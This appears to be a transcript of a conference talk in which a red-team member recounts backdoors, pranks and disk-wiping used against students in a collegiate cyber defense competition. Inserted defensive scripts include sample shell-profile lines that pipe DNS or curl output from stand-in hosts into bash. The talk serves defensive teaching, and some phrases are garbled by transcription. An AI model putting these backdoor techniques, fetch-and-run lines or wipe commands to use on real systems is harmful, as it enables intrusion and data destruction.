Hello. This is Forrest. I am here to speak to you today about some certain shenanigans that I pull off once a year, hacking college kids and telling you exactly how they do it wrong. Let's go ahead and get right into the slides. So, if you want more information about me, you're welcome to look at jrwr.io. I'll be happy to provide guidance. There's a contact page and such. You can get ahold of me on Twitter and the like. So, what I do, well, I should say, who am I? Some of you have probably seen me floating around DEF CON before. I am Hachan, pretty much. Everybody knows me by this crazy hat of mine. It's a pith helmet with a Wi-Fi access point on it. Everybody generally loves it. But I've done a couple of other weird things over the years. Right now, I'm a Department of Defense subcontractor, cyber security auditor. Pretty much, I do audits for small military manufacturers. They make parts, whatever. And they do it terribly, usually. It's rather boring, though. It's working to stay 101-21, if you want to look up that tomfoolery. At one point, I was a Dogecoin mining pool operator in Sassaman for a fundraiser for the Doge car. That was also awesome. And that's also where the pith helmet comes from, way back then. As you can see, the Doge car was amazing. You should Google it. There's some videos out there of me being chased with a beer cooler because I had to steal it for some ice shenanigans. But for this talk, what's really relevant is that I've been a red team member for NECCDC for about three years now. It's the Northeast Collegiate Cyber Defense Competition. The basics of the competition are that there is a blue team, which is college students, being thrust into a network of sorts, a standardized business network that they would come across, and they have to do all the things. So it's several teams of students from local regions for the Northeast corridor, and there are others for each region. And so they're kind of like an emergency blue team, right?
So they come in and they have to fix the network, whatever's wrong with it, to get it stable. They have a list of services that they have to keep online. We've already been given about an hour to attack them as red team before they could even get hands on keyboard the night before. So we've got all of our implants in place to make sure they're nice and pwned. Generally it's a two-day event. The red team is a group of chosen pen testers and infosec nerds. Generally, it's mostly people who've been working with the professor that's running it, Darryl Johnson, at least for the Northeast corridor. Darryl's great. He's at RIT, Rochester Institute of Technology, and they run the red team. There are other teams, black and white, for support as well. The white team is the people in the rooms that help the teams out, just basic support roles, filing tickets if something explodes, things of that sort, things getting fired. The black team is the one who actually manages the infrastructure, making sure that everything's up and running and such. They generally have physical hardware that they're dealing with. This year it wasn't, of course, because it was virtual, but the last two years, which is what we're covering, 2018 to 2019, it was in person and we could really fuck with the hardware with implants. So on top of defending themselves from red team, they also have to do other things that are worth points, and some of it's worth a lot of points, right? So there's incident response, right? They have to write up a report stating, you know, this is how we were compromised, or this is what happened, this is the current state of the system, this is what we did to fix it, and such. Then there are things called injects. Maybe it's a request from the CEO to do something like change his password or allow him VPN access. The black team is always throwing them new stuff to do. And those are worth a good amount of points. Those are considered daily operation stuff, right?
Stuff you'd have to do on a day-to-day basis as somebody who is doing general IT in the network. So then, from there, scoring is really based off of how long red team had access, the reports made, and the services kept alive, and the scoring of the services is automated. And that's what we mess with as well, you know, our spoofing and such. So the first hour that we get access to the network, we infect everything. We have all of their passwords in a table already. So we have scripts in place. First thing we do is hit enter and backdoor everything that we can get hold of. And we do all the crazy. Cobalt Strike, which a lot of you might know from your toolkits, was actually written for NECCDC by Raphael Mudge. Great guy, by the way, if you ever meet him at DEF CON; he does float around there. Dude is crazy good at it. He does these DNS slow-burn beacons. So he'll stack beacons on top of one another. He'll do these really fast HTTP beacons, but then we'll have these beacons to a special domain that he's only registered for this, where it only polls once every six hours. Right. So if they haven't removed it from the system, they're not going to notice the traffic. And then he uses that to pivot more beacons into the system for the faster ones. And those are the ones we work off of, generally. He provides the team server and we, you know, fuck with the system from there. He does, you know, DNS fronting, ICMP ping beacons, IPv6-based beacons. We've done that once before; that was fun because the Palo Altos don't filter that very well. But if you use Cobalt Strike, now you know why some of the features are the way they are. At least from what I understand from Mudge, it was written for NECCDC and it was solving a problem Armitage just wasn't solving, right? So he was improving Armitage and he just got better with it, and he started selling it as a product because it was a good idea.
Disable the antivirus, infect the networking hardware, you know, the Palo Alto, their switches, their firewalls. We have access to it all, so we just go to town. You know, we have full access to practically everything. We have the domain admin password, so we just start deploying everything that we have in our arsenal. So if you think of every single piece of kit that you can deploy against what you have as domain admin for persistence, we generally do it, right? We have a team of about 15 that we're having to manage. I think it was 10 teams last year. So it really is a high workload. That's why there's a lot of grouping and stuff like that in Cobalt, because we have to do it on a per-team basis; we have to score per team. We're doing Linux backdoors, because I'm a Linux nerd; I do all kinds of fuzzy things. For instance, you know, PAM backdoors and things of that sort, and we'll cover that here in a moment. But we try to keep low. And we watch as teams try to find us, right? Like a lot of times their services just go down because they're just breaking it for themselves, right? We're just persisting. So what we'll do is steal some passwords. The Cobalt Strike keylogger is amazing for this. We will steal some SSH keys, AWS keys if they're doing cloud that year. They love just leaving them on their Linux boxes, right? We'll reinfect, where we can, using some of the common backdoors that we use. We have an IIS backdoor that was written. I don't think it's publicly released, but it is signed using unleaked certificates, whenever he actually had a code signing cert, but they wouldn't renew it for him this year. And PAM, I have to say, its backdoors we would use; nothing ever gets students. We can just log in with whatever password we want as root. Bash backdoors, these are my specialty. I've actually recompiled bash for systems and placed backdoors in it, or it just runs an extra curl command and pipes that into whatever.
We're doing DNS backdoors that way. There's an environment variable that you can set right offhand, an environment variable where it's a callback; it's supposed to be the missing-command callback or just a command callback, and it will run after every successful command. You just run that every time, right? You set it in /etc/profile. Nobody ever looks at their environment variables for compromises, right? Not for two years at least. We were piping dig directly into bash for that. We're doing TXT records and just shoving shell in, and we're waiting for them to show up on their firewall. It wasn't like we were encrypting it or anything. They still have monitoring in place like Splunk, and we'll just backdoor it. We've got a guy we call our Splunk nerd, and he has a custom application that he'll attach to their Splunk instance. What it'll do is that it becomes his managed instance, so they're all kind of upstream to a centralized orchestration system. He just manages everybody's Splunk for them, so he can do deployment payloads that way. Most team members don't notice that this is happening. It's very, very stealthy, and it's great. From my understanding, the code for it is relatively easy to implement; you can just take one of the sample applications and just have it be managed by something else. It loads through it. Most of the time they don't notice it's happening, and you'll see that in some of the screenshots as well, that it's coming down through Splunk. We'll backdoor the Palo Alto, put our own accounts in. There are certain hacks that particularly happen with some of the web interfaces: they'll add little JavaScript snippets that report home. They'll get blocked because they're just blocking all HTTP traffic at this point, but we'll actually inject custom theming where, when they change the password to the web interface, it sends it back to us.
I have a thing where I'll backdoor all the ELFs on a filesystem. Like I'll take BusyBox, take it all, you know, full compile, put the backdoor in there that just runs the command through DNS again. You can compile it, symlink it all out into the Debian system real fast, and anytime they run an application at all, it gets compromised and it links back to the BusyBox binary. And I'll fuck with their PATH a little bit. I rearrange it so that /usr/local/bin is first. So you set that first, you throw a BusyBox in there. They'll never find it. Nobody ever looks in /usr/local/bin, come on. Right. So, we'll also do some tomfoolery. If we notice that they're trying to install detection tools on Windows or Linux, especially on Linux, they'll try to compile stuff, and we'll backdoor it. We have the C backdoors that we just throw in any application. You can find them on GitHub, they're everywhere; you throw them in there and they compile it and they run it. It's backdoored now, the rkhunter is backdoored. We only have two days, so we're just throwing anything that we can that'll stick, right? So, if we see somebody being clever, we'll just blue screen the box, right? Like we're not going to deal with any of their shit. You know, they're trying to be clever, they're going through Process Monitor, Procmon, and going "no," and then we crash the box. Right, we'd rather just crash the box before they get ahold of our loot. Very rapidly, you know, this will happen over the course of a couple of hours. We'll spot the screenshots coming in to Cobalt Strike and we're like, well, he's up to no good, and just crash the box. We'll reboot it, that'll be fine, but maybe put some dancing bananas on the screen. We'll get to that later. Sometimes we like to do annoyances, a lot of annoyances, to really kind of annoy some of the teams. Like there's some teams that really like to use tmux. And we replace it with screen.
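The two persistence tricks just described, a command hook set in a shell profile (the "run after every successful command" variable is bash's PROMPT_COMMAND; the "missing command" one is command_not_found_handle) and a BusyBox dropped early in PATH to shadow real binaries, are both things a blue team can check for in a few lines. The following script is an added example written for this write-up, not the speaker's or the competition's code. It audits the text of a shell startup file for hooks and fetch-and-pipe-to-shell patterns, and it reports which commands in a PATH listing are shadowed by an earlier directory. The profile contents and the directory listing are constructed samples; on a real host you would read /etc/profile, /etc/bash.bashrc and ~/.bashrc and build the listing with os.listdir.

```python
import re

# Constructed sample of a tampered /etc/profile (illustrative only, not from the talk).
SAMPLE_PROFILE = """\
# /etc/profile: system-wide .profile file for the Bourne shell
export PATH=/usr/local/bin:/usr/bin:/bin
umask 022
PROMPT_COMMAND='eval "$(dig +short TXT cmd.example.invalid | tr -d \\")"'
command_not_found_handle() { curl -s http://updates.example.invalid/$1 | bash; }
"""

# Constructed clean profile for comparison.
CLEAN_PROFILE = """\
export PATH=/usr/local/bin:/usr/bin:/bin
umask 022
"""

# Variables and functions bash evaluates automatically; any definition in a system
# profile deserves a look.
HOOK_VARS = ("PROMPT_COMMAND", "BASH_ENV")
HOOK_FUNCS = ("command_not_found_handle",)
NETWORK_TOOLS = ("dig", "curl", "wget", "nc")


def audit_shell_profile(text):
    """Return (line_number, reason) findings for a shell profile's contents."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        stripped = line.split("#", 1)[0].strip()  # drop trailing comments
        if not stripped:
            continue
        for var in HOOK_VARS:
            if re.match(rf"(export\s+)?{var}=", stripped):
                findings.append((lineno, f"{var} hook set"))
        for fn in HOOK_FUNCS:
            if re.match(rf"(function\s+)?{fn}\s*\(\)", stripped):
                findings.append((lineno, f"{fn} defined"))
        # A network fetch whose output reaches a shell (pipe to bash/sh, or eval).
        fetches = any(re.search(rf"\b{t}\b", stripped) for t in NETWORK_TOOLS)
        if fetches and re.search(r"\|\s*(bash|sh)\b|\beval\b", stripped):
            findings.append((lineno, "network fetch piped into a shell"))
    return findings


def find_shadowed_commands(path_dirs, listing):
    """Return (command, directory_that_wins, directory_shadowed) for every command
    that appears in more than one PATH directory. `listing` maps a directory to the
    set of executable names in it; here it is constructed, on a real host use os.listdir.
    """
    first_seen = {}
    shadowed = []
    for directory in path_dirs:
        for name in sorted(listing.get(directory, ())):
            if name in first_seen:
                shadowed.append((name, first_seen[name], directory))
            else:
                first_seen[name] = directory
    return shadowed


# Constructed listing: a BusyBox-style drop in /usr/local/bin shadowing coreutils.
SAMPLE_PATH = ["/usr/local/bin", "/usr/bin", "/bin"]
SAMPLE_LISTING = {
    "/usr/local/bin": {"ls", "ps", "netstat"},
    "/usr/bin": {"ls", "ps", "netstat", "vim"},
    "/bin": {"ls"},
}

if __name__ == "__main__":
    for lineno, reason in audit_shell_profile(SAMPLE_PROFILE):
        print(f"profile line {lineno}: {reason}")
    for name, winner, loser in find_shadowed_commands(SAMPLE_PATH, SAMPLE_LISTING):
        print(f"{name}: {winner}/{name} runs instead of {loser}/{name}")
```

On Debian-style systems /usr/local/bin legitimately precedes /usr/bin, so the PATH order alone is not a finding; what matters is a copy of ls, ps or netstat turning up there at all, which is why the second function reports shadowing rather than ordering. Any shadowed coreutil should be hashed against the package's copy (dpkg -V or rpm -V) before it is trusted.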
You can't run tmux. Oh, but if you try to run screen, that just dumps /dev/urandom to your terminal. But if you try to run emacs, it'll actually open vim, and if you try to open vim, it opens up nano, which is super fun. They really hate it when you do that to somebody who's trying to remediate a box; the commands keep changing out underneath them. And they're trying to figure out how you are in the box, since you're not even showing up. Well, we have a TTY and they have three Metasploit sessions or something like that, and we're just going, you know, "which screen is screwing with you?" Automation is key, though, right? If you're popping this many boxes, we're having to handle over 100 boxes. Automation is key, until you start noticing somebody trying to be clever and you go and fuck with them for a couple of minutes. We'll reconfigure their DNS to make them distracted and we'll just drop their DNS into a black hole. Our beacons still work but their DNS doesn't. Right. They'll be pointing to our DNS servers, which drop everything but our beacons. We've screwed up a couple of teams doing that. That was super fun. Reconfigure the Palo Alto right underneath them. Right. They keep adding a block rule; we'll drop that block rule, or we'll reconfigure that block rule so it doesn't work. The order's out of place and the allow rule's just stuck up there, and all the block rules don't work, you know, order of operations. We reconfigure services to bring them down. Right. That's part of the scoring. We don't have a particular score ourselves, but we want to make them score as little as they can, for all the teams. So we'll deface web pages, we'll deface the backgrounds, we'll deface services, anything that we can get a hold of. All services are scored with ping, SSH, and then maybe the contents of the web page itself. Right. So if it doesn't match a checksum, then it's considered down, and we'll deface them and bring them down.
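The "order of operations" trick above, an allow rule sitting above the block rules so the blocks never fire, is worth checking for mechanically, since a firewall with first-match, top-down evaluation (which is how the Palo Alto policy described here works) silently makes any narrower rule below a broader one of the opposite action dead. The code below is an added example, not anything from the talk or from a Palo Alto tool: it models rules with exact-or-"any" fields, reports block rules shadowed by an earlier allow, and shows the fix of placing blocks first. The ruleset is constructed, and the match model is deliberately simplified (no CIDR containment, no zones).

```python
FIELDS = ("src", "dst", "proto", "port")


def covers(a, b):
    """True when every packet matching rule b also matches rule a.
    Fields are either 'any' (wildcard) or an exact value in this simplified model."""
    return all(a[f] == "any" or a[f] == b[f] for f in FIELDS)


def shadowed_rules(rules):
    """Walk the policy top-down. A rule is shadowed when an earlier rule with a
    different action already matches everything it would match, so it never fires.
    Returns (shadowed_rule_name, shadowing_rule_name) pairs."""
    out = []
    for i, rule in enumerate(rules):
        for earlier in rules[:i]:
            if earlier["action"] != rule["action"] and covers(earlier, rule):
                out.append((rule["name"], earlier["name"]))
                break
    return out


def blocks_first(rules):
    """Reorder so every block rule precedes every allow rule, keeping relative order.
    This is the simple fix for the shadowing pattern; it does not change which
    packets each rule describes, only which one is consulted first."""
    return [r for r in rules if r["action"] == "block"] + \
           [r for r in rules if r["action"] != "block"]


# Constructed policy: the broad allow was left on top, so both blocks are dead.
SAMPLE_RULES = [
    {"name": "allow-all-outbound", "action": "allow",
     "src": "10.0.0.0/24", "dst": "any", "proto": "any", "port": "any"},
    {"name": "block-dns-out", "action": "block",
     "src": "10.0.0.0/24", "dst": "any", "proto": "udp", "port": "53"},
    {"name": "block-icmp-out", "action": "block",
     "src": "10.0.0.0/24", "dst": "any", "proto": "icmp", "port": "any"},
]

if __name__ == "__main__":
    for dead, by in shadowed_rules(SAMPLE_RULES):
        print(f"{dead} never matches: shadowed by {by}")
    print("after reordering:", shadowed_rules(blocks_first(SAMPLE_RULES)))
```

Run on a real export you would also want to diff the rule order against yesterday's copy, since the attack here is not a new rule but a reordering of existing ones.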
My personal favorite was uninstalling nginx and replacing it with Apache, kind of configuring it right and then just leaving it half broken and letting them fix it. So, I mean, you're trying to get as much time as you can to have them leave your main beacons alone; have them misdirected, right? You want them to focus on the crazy that is happening. So, this is going faster than I expected, but hey, that's working. So day two is when the fun really starts, right? Because we don't really want to blow up their boxes on the first day. But we do want to do it on day two. So we install the new backdoors, anything that we cooked up overnight, because we don't sleep. That's what caffeine's for. And then we just activate all my prank scripts. I started doing that when I first joined. I just had some on hand. And we'll see some of these; by the way, I got a little treat for you. Rotate the screen by 90 degrees every 30 seconds; makes it really hard to admin a box. Dancing bananas all over the screen. It's actually a fork bomb I've written; you can see an example of that in the bottom right-hand corner, them trying to kill it and it's not working. 500% sized mouse. Super funny when it happens; they can't really use the mouse because it's slightly broken, but it's good fun. Bad keyboard inputs, you know, now they're Dvorak. Good luck. You can't change it now, by the way; we've disallowed administrators from changing that registry key. You're going to have to change the ACL on that. Sorry, you're going to have to go find it. ACLs are very powerful in Windows for registry keys. You can set some insanity in there and make it where they can't remove your shit, unless they actually go in and rip those ACLs out, right? So I had one, which is actually part of the banana script: there's a list of process image names, it's the debugger key. Go look up the image name debugger key and you can do some really backdoor shit.
And it just won't run programs; it'll say program not found, or in my particular instance, every time you run the program it would just spawn a new banana. Task Manager, Procmon, a lot of the AV software that they were trying to run; we'd kind of be dynamic with it, you know, so we kind of work with it. Generally, it was kind of a dynamic environment on day two, trying to really screw with them, because they had a lot to think about, right? They're really trying to keep the services up from us, because they have 15 people going at them and they're a team of eight. Um, later on in the day we'll really start screwing with services, memes, you know, defacing backgrounds, things like that, to really let them know that we're home. Deleting files, programs, changing passwords, right? We'll delete files from underneath them when they're writing a report. We'll just delete it right there in front of them. "You're so mean." But that's what makes it so much fun. You got to try something. So we'll delete stuff they're writing; if they're drawing something in MS Paint we'll draw something for them and they freak out because we're controlling the computer. We'll start Googling things for them on their own computer; that's super fun, you know, Rickrolling them, things like that, just opening up URLs, sending them helpful messages, offering help. Ransoming the domain controller for donuts. It was the funnest thing we've done. We did that a couple of times, where we would ransom a service and we'd want donuts, and they would have to go and hunt down donuts, or other various things for us. We had a dance-off to get your domain controller back after we'd pwned like six of them. They are force one. So, as you can see, this is the most fun you'll ever have as red team, ever. Two days packed full of craziness, but it gets better. So after we've done all the shenanigans, there's a slight story here. So if you look in the very, very bottom there.
There is a search warrant for it. One year, the local police department decided that they're going to help out, and we asked them, hey, you want to do a no-knock raid on some of the students' rooms? So we coordinated that with them and they did it for all the teams; they raided and took their domain controller, just stole it. So we went in there looking all official, scared the crap out of most of them. It was great, though; it was hilarious the whole time. There is some video of this I will show you later. But shenanigans, lots and lots of shenanigans, the most shenanigans you'll ever have being a red teamer. The burn, right? This is the last hour. This is when we're nuking the disks. You can see here we're doing rm -rf --no-preserve-root, screw the disk, you know, dd if=/dev/urandom to the disk, blue screen the boxes, delete the AWS account. It doesn't like it when you do that, by the way. We cat over the bootloaders, anything that we can do to destroy their systems, so that anything we had access to is destroyed. Nuclear, right? So, after all of this is done, we tell them what we did, right? We actually sit down with every team and say, well, okay, so your team seven, well, you kept giving us your passwords through the keyloggers. You never found the PAM backdoor. Right, it's here every year; we told you this last year. You didn't block us, right? Were you checking for DNS traffic, or were you too busy doing injects, or did your firewall guy not know to look, because there's a new guy, and did not check for DNS traffic, did not check ICMP traffic, things of that sort. So we'd actually sit down with them and tell them what they did wrong. A lot of it was they just weren't looking. You know, anybody with Wireshark and a mirror port can really see us. Like when 90% of the traffic coming out of your box is DNS, and it's like gigs of it, you have a problem. And a lot of times they just don't block it.
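The debrief point that "90% of the traffic coming out of your box is DNS" is a detection you can automate from a mirror port or flow export, and it catches both the TXT-record shell described earlier and the slow-burn beacon's one-off subdomains. The script below is an added example for this write-up, not anything from the talk: it takes per-flow records (a constructed, simplified format: timestamp, source IP, protocol, DNS query type, query name, byte count) and flags a host when DNS dominates its traffic, when it issues many TXT queries, or when it asks for many distinct subdomains under one zone. Thresholds are assumptions chosen for the sample; tune them to your baseline.

```python
from collections import defaultdict

# Constructed flow records, not competition data. Host 10.0.0.5 is pulling
# commands over TXT records from a throwaway zone; 10.0.0.6 is browsing normally.
SAMPLE_FLOWS = """\
2019-03-02T09:00:01 10.0.0.5 dns TXT a8f3e1.c2.example.invalid 310
2019-03-02T09:00:31 10.0.0.5 dns TXT 9c02bd.c2.example.invalid 310
2019-03-02T09:01:01 10.0.0.5 dns TXT 44e7aa.c2.example.invalid 310
2019-03-02T09:01:31 10.0.0.5 dns TXT d1b9f0.c2.example.invalid 310
2019-03-02T09:02:01 10.0.0.5 dns TXT 7e5c13.c2.example.invalid 310
2019-03-02T09:02:31 10.0.0.5 dns TXT 0af6c8.c2.example.invalid 310
2019-03-02T09:03:01 10.0.0.5 dns TXT b3d2e4.c2.example.invalid 310
2019-03-02T09:03:31 10.0.0.5 dns TXT 5f9a07.c2.example.invalid 310
2019-03-02T09:00:10 10.0.0.5 http - - 500
2019-03-02T09:02:10 10.0.0.5 http - - 500
2019-03-02T09:00:05 10.0.0.6 dns A www.example.invalid 80
2019-03-02T09:00:06 10.0.0.6 dns A cdn.example.invalid 80
2019-03-02T09:00:07 10.0.0.6 http - - 1500
2019-03-02T09:00:08 10.0.0.6 http - - 1500
2019-03-02T09:00:09 10.0.0.6 http - - 1500
2019-03-02T09:00:11 10.0.0.6 http - - 1500
2019-03-02T09:00:12 10.0.0.6 http - - 1500
"""


def summarize(flows):
    """Aggregate per source host: total bytes, DNS bytes, TXT query count, and the
    set of leftmost labels seen under each zone (naively the last three labels)."""
    per_host = defaultdict(lambda: {"total": 0, "dns": 0, "txt": 0,
                                    "subdomains": defaultdict(set)})
    for line in flows.splitlines():
        if not line.strip():
            continue
        _, src, proto, qtype, qname, nbytes = line.split()
        host = per_host[src]
        size = int(nbytes)
        host["total"] += size
        if proto != "dns":
            continue
        host["dns"] += size
        if qtype == "TXT":
            host["txt"] += 1
        labels = qname.split(".")
        if len(labels) > 3:  # something.zone.tld.suffix: record the leading label
            zone = ".".join(labels[-3:])
            host["subdomains"][zone].add(labels[0])
    return per_host


def flag_hosts(per_host, dns_share=0.5, txt_min=5, sub_min=5):
    """Return {host: [reasons]} for hosts whose DNS profile looks like a channel.
    The three thresholds are assumptions for this sample, not measured baselines."""
    findings = {}
    for src, host in per_host.items():
        reasons = []
        share = host["dns"] / host["total"] if host["total"] else 0.0
        if share > dns_share:
            reasons.append(f"DNS is {share:.0%} of bytes")
        if host["txt"] >= txt_min:
            reasons.append(f"{host['txt']} TXT queries")
        for zone, subs in host["subdomains"].items():
            if len(subs) >= sub_min:
                reasons.append(f"{len(subs)} unique subdomains under {zone}")
        if reasons:
            findings[src] = reasons
    return findings


if __name__ == "__main__":
    for src, reasons in flag_hosts(summarize(SAMPLE_FLOWS)).items():
        print(src, "->", "; ".join(reasons))
```

The byte-share test is the one that survives obfuscation: encrypting or encoding the TXT payload changes nothing about the fact that a workstation should not be sending gigabytes of DNS. Blocking outbound port 53 to anything but your own resolver, and alerting on TXT volume at that resolver, removes the channel rather than just detecting it.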
I always said, if I had a good firewall guy, somebody who had Wireshark open on a mirror port, just streaming logs, maybe booted off a live CD or something, they'd be able to find us, right? We're very noisy, right? Maybe not the long-term beacons, but you just do standard incident response, and most of our stuff is detectable, right? Cobalt Strike's super detectable. You know, open up Procmon and you see the crap that's going on, and I'll ask, right, kick us out as fast as you can. Right, even if you bring services down, incident response, and mind you this is a compressed timeframe, but this kind of goes for most incident response: don't be afraid to turn off the network. I mean, even if it's just 10 minutes, right, to get your bearings and start looking at traffic. Hands off keyboard, plug the ethernet back in and see what's happening, right? See what's talking. Chase those traces down, kick us out, because if you kick us out we can't get back in. If we don't have your passwords, we don't have any beacons, we're not getting back in, right? We have some of the backdoors and sometimes they stay, but a lot of the older ones, they're all picked up by AV nowadays. So a lot of it is they just haven't had a lot of experience with dealing with these computers and dealing with systems like this, right? They're in a system administration role trying to do security here, and all they've been taught is security. So they've got to treat the systems as hostile. They're not doing that most of the time, right? They trust the permissions, they trust the files they're leaving on the system. They're trusting their backups. We've infected the backups; we've done that. They're going to restore from a backup, and we'll reinfect them again, because it's an old password and we always try the old passwords, right? Like, this is how it works.
So, most of this is just trying to get the word out about what we're doing, right? It's really easy to spot us once you know what we're doing, because we're up to all kinds of shenanigans. And so, we're not doing anything revolutionary here; most of this stuff is just a grab bag of anything that we can find off GitHub, for the most part. I mean, Cobalt Strike's really nice, and we do write some shenanigans for some of the scripts, but really though, we're not doing anything particularly special. But year after year, we have students, we have teams that are amazing at this, right? They kick us out in 15 minutes and maybe we'll get back in on the second day, right? Maybe they'll fall for a phishing email. We've had that happen once. Or we'll steal something from the room. I suppose there's physical security kind of involved; we don't do it that much, but we'll steal a laptop, or, you know, give it back to them with Windows XP on it and expect them to use it because there was a service on it. So, I have videos I'm going to show you. I'm going to talk over them; I'm not going to play the terrible music that's on them. Both of these are on YouTube. You can look up NECCDC and you can find all of our previous years' videos, right? They're not very long, and they really showcase some of the payloads that we're getting back, in a lot of the ways that I can show. So, my number one here. So this is from 2019. I'm going to skip just a smidgen ahead here. So we have backdoored the Wi-Fi router. We just set up a custom update server. Here they're Googling how to do security, you know, Wi-Fi passwords. So we got a little bit of a backchannel stream from white team, and they'll post in the Slack some of the things that they find from us, but as red team, you know, passwords come through the keyloggers. And you can see, password discipline is so terrible with these people sometimes.
You know, they're trying to track us down in Procmon and management corp. Beaver. I don't think it's supposed to be that. They're futzing with their DNS. You know, changing their administrative passwords, because they don't know; might as well, we run it. King-size mouse was run on a couple of machines; you can see it here in action in Cobalt Strike. It makes the machine very hard to use, but you can get rid of it. So let's figure out why their DNS has been changed to another server; because it's ours now. Yeah, we were dropping some Rickrolls on them several times. A lot of kids, they just don't know the memes. Yeah, we did that a couple of times; we'll change out the Wi-Fi password, or the Wi-Fi AP name, to what their password was, just to show we care. So we had a backdoor; they had to keep Wi-Fi up. And so we have a little Wi-Fi router up that we are actually using as a backdoor, and getting all the teams with it. You know, making some puns and jokes and things of that sort; we did a lot. Sometimes they like to paste the password in a Slack. Don't do that. That's being managed by red team; that's a pretty common problem. This is all set to terrible music that I'd rather not play. Them trying to install Security Essentials. Are they not teaching them what counts as antivirus on Windows nowadays? It just doesn't work on Windows Server. Sorry. You really should turn that on, and setting your passwords is not going to do any good if we have a keylogger on the box, right? We'll send them helpful messages, you know, to annoy them, that we see them editing their firewall and it's not doing any good. More passwords, of course. Really, keyloggers are so old school, right? Like, oh, who installs a keylogger? But they just give up everything every time; really look to install the keyloggers if you're popping a box. More dancing banana shenanigans as usual.
I always like to drop them on boxes that we kind of have access to but haven't done anything on in a while. We want to show them proof that we're in their box, right? We want to give them that little tickler that we're still fussing with their systems. They try killing it, but each banana is a separate process, so if they don't know how to mass kill stuff, then our bites aren't going to help you. You can see here they're actively being run. Mind you, these recap videos are made like an hour before the competition ends, so they're made in a rush. More helpful messages from banana man. They weren't killing them fast enough; I just kept spawning more of them just to annoy them. The banana itself, it's not backdoored; it does change some things. Yes, yeah. So this is it rotating by 90 degrees every 30 seconds, and we actually got video from one of the white team. These ultra-wide monitors make it super stupid. This is, you know, it works fine now, but give it 30 seconds and it won't. They're trying to figure out how to kill it and I'm playing Yakety Sax over their audio at the same time; they still haven't closed it. We do this to all the teams; this is the one we got video of. And so this cracks me up every time I watch it. You know, we give them some encouragement; they get demoralized very quickly. But we'll actually back off of people that we have access to towards the end there, mostly because, you know, kicking the puppy while it's down, we don't like to do that too terribly much. But, you know, more bananas on their write-ups is super great. Oh yeah, nothing's infected; bananas everywhere. They write on the board sometimes; we'll see a password off the whiteboards; we'll take photos through cracks in the walls and stuff. More bananas. This spot, I have one that'll just fork bomb a machine to the point where it just won't run anymore. A team challenged us saying, hey, we don't have any bananas on ours. Yeah, give it 10 minutes.
We really shouldn't be killing svchost. We had sign-in sheets and we did actually sign in as red team, and nobody checked. They're trying to run ClamAV on the box, and that's not going to do it; again, the definitions are too old. These are examples of some of the injects. Some of it is going quite fast, but more words of encouragement. At this particular point, right, they've got so much stuff running that it's starting to bog down their boxes, but you know, they'll give us keys, and really we're just Googling stuff better than them. We're letting them know that their box is still popped. There's really the WAP; that's what they have in the rooms. One of the teams did that. Yeah, so we stole the laptops and we gave them Windows XP. It was great. We put all of our malware on it too, and we stole it without them knowing; it was great. All the teams did not notice that we had stolen their laptop, and we just gave it back to them. Some encouragement from remote tech support. So this one, they're doing some role-playing here, so this guy is yelling at them. If you watch this video on YouTube it's a little bit better, but this guy is yelling, and I'm like, well, why did he steal the laptop? Did you record it? Like, who was this person? And, well, I mean, you know, the student doesn't know what the hell is going on at this point, right? Like, he doesn't know how to respond. So the students are giving real words and he's like, well, what the fuck? Why did the laptop walk off? Right, so he's trying to explain himself and it's not very good. He's trying to figure out, well, they just stole it from underneath your keyboard? Like, how did this work? Right, did you give him the laptop? And why is he playing Tetris? Tetris didn't hit bootloader. So that happens so many times, right? We hardly get to see that as red team, but here's us imaging them all. Somebody actually had an image for this laptop for Windows XP, and they just downloaded it from work.
And we were getting beacons off of them. So this is some of the searches and typing that's coming in, while we still have beacons for days. Bad passwords. At this point they've changed their passwords six, seven, eight times and they're just done. We made good friends with him. He's going to pwn his own box, but unfortunately the beacon had disconnected. But he was one of the team members. He'd wanted the dance-off to get his domain controller back. So here you can pwn your domain controller again. They had sign-in sheets. We were signing in with anything and everything under the sun, and nobody was checking when they should have been. We had an escort against that too. We're starting to delete things now, and it's just out of control at this point, right? So, you know, a CEO is asking, why are you playing Tetris? We still run Gateways. I thought we all had Dells. Because their gateway was down. They didn't have internet because we'd nuked the Palo Alto. And that's just wall messages back and forth, you know, chatting with the teammates going, you know, can we pop a box? There's always women in our technical capable of breathing fire. Definitely so. So this one's where, you know, the network is down and he's losing money. And he's yelling at the teammates going, well, what's going on? Like, I'm not going to sell the other house in the Hamptons. I'm going to fire you first. Classic CEO speaking. He's walked out. We saw Mr. Dino a lot of times. You'll still have beacons. Oh, this is the group shot. This is all the red team for 2019. You can see me there in the corner. Mudge is in the center. You know, I don't remember half these people's names at this particular point. We don't meet that often, but I have a mug with all their names on it, though. Daryl's on the left there. But this is who they have to defend themselves against, right? There's Silas. He used to work at VirusTotal.
He would weaponize malware that he would get in from Google and VirusTotal and sic it on students. The madman. He would neuter it, right? There was an incident, but he would neuter it and repurpose it for students. So he would actually infect them with malware; just the beacons were going back to him instead. Crazy, crazy fellow. Most of these guys are networking engineers. Most of them aren't even red team normally. You know, this isn't what they do; they're a red team for this. They're more dangerous because they're in the field every day, right? They're networking engineers, Splunk engineers, and they know the full depth of those applications. They know what they can do. And then you take that and twist it. That's what I think is fundamental to being a red team, right? You know how that stuff's supposed to work, and then you twist it to your needs, your evil, evil needs, to do what you needed to do, right? You have much more scope available. You have the ability to hide better if you know more about what you're dealing with, especially with applications. Well, I'll just talk about near off. We'll go ahead and go on to the second video here. Let's skip ahead a little. This is from 2018. More shenanigans, you know, giving us their keys for AWS. Yes, we would persist with a team, with a user named "white team" on the box. They had to go in through the serial console that year. They really didn't understand what was going on. They didn't know it was serial. I think they were trying to screw with each other. Allowing us to see traffic is always a bad idea. By the way, they're generally very flat networks. Us, wall messages, and their Splunk admin going, hey, do you need to get your Splunk working? Yes, we've done that. We've installed Linux on a box. You know, always check your agent names. We're always changing your passwords for you, because you should be changing them often. And if you're not, we're going to. We'll wipe your backups, always, right?
